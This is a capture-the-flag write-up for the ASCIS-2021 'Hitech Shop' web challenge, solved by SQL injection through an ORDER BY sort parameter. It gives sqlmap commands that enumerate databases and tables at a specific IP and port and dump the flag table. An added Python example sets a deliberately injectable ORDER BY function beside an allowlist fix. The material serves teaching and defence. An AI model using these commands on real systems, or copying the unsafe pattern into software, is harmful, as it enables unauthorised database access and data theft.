D4rkP0w4r/ASCIS-2021---Warm-up

ASCIS-2021 Warm-up - 100pts

  • Category: Web
  • Name: Hitech Shop
  • Level: None
  • Description: None

Solution

  • Overview: the challenge provided us a search box; I think it is SQL injection. [screenshot]
  • I tried a double quote and this is the server response. [screenshot]
  • Run this command in sqlmap: sqlmap -u http://125.235.240.166:20105/index?order=price --time-sec=200 --user-agent=* --dbs --level 5
  • I found two databases, but I only paid attention to vannd. [screenshot]
  • Then I used the command sqlmap -u http://125.235.240.166:20105/index?order=price --tables -D vannd to scan the tables of vannd
  • Finally I found a table containing the flag =)))) [screenshot]
  • Later I scanned the flag table using this command: sqlmap -u http://125.235.240.166:20105/index?order=price --columns -D vannd -T flag --dump [screenshot]
  • FLAG ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}
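
The flag and the order=price parameter point at a request value reaching an ORDER BY clause. The following is an added example, not code from the challenge or from this write-up: it shows that pattern beside an allowlist fix, assuming a hypothetical products table in SQLite with constructed rows.

```python
import sqlite3


def make_db():
    # Constructed sample data; the table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (name TEXT, price INTEGER)")
    db.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("phone", 900), ("cable", 5), ("laptop", 1500)],
    )
    return db


def list_products_unsafe(db, order):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so whatever the client sends is parsed as SQL syntax.
    query = f"SELECT name, price FROM products ORDER BY {order}"
    return db.execute(query).fetchall()


# Accepted request values mapped to fixed SQL fragments.
ORDER_COLUMNS = {"price": "price", "name": "name"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_products_safe(db, order="price", direction="asc"):
    # Placeholders bind values, not identifiers, so a sort column cannot be
    # passed as a bound parameter. Look it up in an allowlist instead and
    # build the query only from the fixed fragments.
    try:
        column = ORDER_COLUMNS[order]
        way = DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError("unsupported sort option") from None
    query = f"SELECT name, price FROM products ORDER BY {column} {way}"
    return db.execute(query).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(list_products_safe(db, "price", "desc"))
```

Anything outside the allowlist is rejected before a query is built, which is the property a scanner probing the order parameter would no longer find missing.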